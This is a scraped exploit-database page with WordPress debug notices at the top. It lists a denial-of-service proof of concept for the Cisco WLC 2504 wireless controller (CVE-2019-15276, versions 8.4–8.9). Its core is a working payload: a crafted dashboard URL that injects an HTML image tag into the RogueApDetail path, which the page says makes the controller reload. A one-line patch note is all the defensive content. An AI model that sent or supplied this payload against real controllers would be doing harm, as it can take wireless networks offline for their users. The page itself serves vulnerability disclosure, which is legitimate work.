Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
Cisco WLC 2504 8.9 - Denial of Service (PoC) - exploit.company
header-logo
Suggest Exploit
vendor:
WLC 2504
by:
SecuNinja
6.5
CVSS
MEDIUM
Denial of Service
CWE
Product Name: WLC 2504
Affected Version From: 8.4
Affected Version To: 8.9
Patch Exists: YES
Related CWE: CVE-2019-15276
CPE: cisco:wlc_2504
Metasploit:
Other Scripts:
Platforms Tested:
2019

Cisco WLC 2504 8.9 – Denial of Service (PoC)

Firing the provided code will cause the Cisco WLC 2504 system to reload, resulting in a Denial of Service (DoS) condition.

Mitigation:

Apply the patch provided by Cisco to mitigate the vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Cisco WLC 2504 8.9 - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-11-25
# Exploit Author: SecuNinja
# Vendor Homepage: cisco.com
# Software Link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos
# Version: 8.4 to 8.9
# Tested on: not applicable, works independent from OS
# CVE : CVE-2019-15276

# Exploit PoC:

https://WLCIPorHostname/screens/dashboard.html#/RogueApDetail/00:00:00:00:00:00">'><img src="xxxxx">

# Firing this code will cause the system to reload which results in a DoS condition.
cqrsecured